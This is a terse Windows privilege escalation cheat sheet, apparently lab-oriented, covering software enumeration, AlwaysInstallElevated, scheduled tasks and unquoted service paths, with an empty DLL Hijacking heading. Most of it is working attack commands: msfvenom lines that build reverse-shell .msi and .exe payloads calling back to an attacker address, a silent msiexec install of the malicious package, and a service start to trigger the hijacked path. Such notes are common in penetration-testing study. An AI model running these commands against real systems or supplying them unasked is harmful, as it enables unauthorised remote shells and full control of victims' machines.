Privileges Escalation

Vulnerable Software

   1) wmic product get name,version,vendor
   2) wmic service list brief | findstr  "Running"
   3) sc qc SERVICENAME
   4) Searchsploit, metasploit, Exploit-db, Github, Google

Quick Wins

1) schtasks /query /fo LIST /v
   2) AlwaysInstallElevated (Malicious .msi)
      1- reg query   HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
      2- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      3- msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.65.26 LPORT=LOCAL_PORT -f msi -o malicious.msi
      4- msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi	

Unquoted Service Path

1) wmic service get name,displayname,pathname,startmode
   2) check if can write to folder in path
   3) msfvenom -p windows/x64/shell_reverse_tcp LHOST=[KALI or AttackBox IP Address] LPORT=[The Port to which the reverse shell will connect] -f exe > executable_name.exe
   4) sc start unquotedsvc

DLL Hijacking

Last updated

Was this helpful?